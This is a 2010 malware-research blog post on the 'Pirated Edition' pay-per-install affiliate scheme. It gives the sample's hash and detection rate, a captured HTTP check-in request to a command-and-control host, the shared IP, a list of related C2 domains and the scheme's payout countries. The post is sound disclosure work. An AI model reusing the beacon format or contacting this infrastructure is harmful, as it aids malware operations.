MalwareIntelligence is a site dedicated to research on all matters relating to anti-malware security, criminology computing and information security in general, always from a perspective closely related to the field of intelligence.

15.8.10

Pirated Edition. Affiliate program Pay-per-Install

Affiliate programs are a growing business model more profitable for criminals and create a complete circuit of spreading / malware infection among many other alternatives, encouraging its customers with a percentage of money they get in terms of success their own business.

One of the systems with greater uptake in this business model is provided by the facility payment, Pay-per-Install, where every customer gets the money for the installation of malware. That is, only to propagate malware and wait for someone to become infected.

In this circuit, each member can be either a single person as a botnet, because obviously the economic return generated by spreading the malware offenders provided by the affiliate system is massified, and botmaster benefits from a wider economic gap within a shorter time span, in addition to other veins fraudulent economically generated by botnets.

Another of these affiliate programs is Pirated Edition, whose access panel can be seen in the picture below.


Looking into the affiliate system, we find extremely minimalist model that only allows the client-offender check the amount of money earned and download the malware to spread, including updates to this.


This malicious code whose default name is limew.exe (757eda0929b94ea104a1a80825dee3e2) has a very low detection rate. According to the report of VT, is only detected by 8 of 41 AV engines.

When run, it's reported to true affiliate program that is behind this criminal circuit, in this case, answers husseta.com.

/get2.php?c=ROBFNNDI&d=26606B67393C34322E64636F317E3E3D2121222B25263078747D456E757923271416411A111410015D404E1618156A1971090A03700302010C090B7D7D0C07790305727474047E060C7072786A2F27212634206E6563677130303E666C6E3866505404004204020A55584C041F1B0B1D4D442D42522A021413444A4B4C494E4CB3B5B7B0A2F5F4E8EBB4CFF3FCE1E1FDF5E3BCD6CCD0B0FBFCA8C5FEA1ACB8FCCCCFD6FCC1989681DF9F9E969C8BC892808394D7D1D9D7CE85898A8B8C8D8E8FF1E7A1ADA0A9FBAAA9A5BDAABEA8E3BDB5A2B7B2B7BDF8BBB7BABBB7B8B2B3BE898FC48A80849282D5D8D8D3DDDAD6DDC8C7C6D5B1BAA4 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: 011607da0826.husseta.com
Cache-Control: no-cache


However, this is only one side presented the strategy and that the same IP (95.211.98.246) other domains are resolved that each of them carries the same template.


010407da082d.deanard.com
082707d91010.bauhath.com
100407da083b.leyeshv.com
110407da0837.giselin.com
110507da031e.bauhath.com
111607da0732.giselin.com
131907da0726.deanard.com
142007da0712.weirden.com
142107da071c.giselin.com
151707da052e.antiona.com
160607d9110b.bauhath.com
161607da0722.leyeshv.com
162507da0612.mccorbet.com
171907da062d.bourgum.com
172307da072e.koralda.com
180507da0308.bauhath.com
181607da031b.derchy.com
182707da0130.bauhath.com
192507da071b.dativism.com
210907da020b.bauhath.com
222707d9101f.bourgum.com
222807d9092a.apomenbe.com

It's worth mentioning a particular detail of the policies of this affiliate program. To obtain payment for each installation of malware, it must infect computers that are in the following countries: Australia, Belgium, Brazil, Canada, Czech Republic, Denmark, Estonia, France, Germany, Greece, Finland, Hungary, Italy, Ireland , Kuwait, Lithuania, Mexico, Netherlands, New Zealand, Norway, Poland, Portugal, Romania, Russia, Saudi Arabia, Singapore, Slovakia, Spain, Sweden, Switzerland, Turkey, Ukraine, United Arab Emirates, United Kingdom, United States and Japan . And as a payment system using Epassporte services, AlertPay, PayPal and Webmoney.

Related information

0 comentarios:

Post a Comment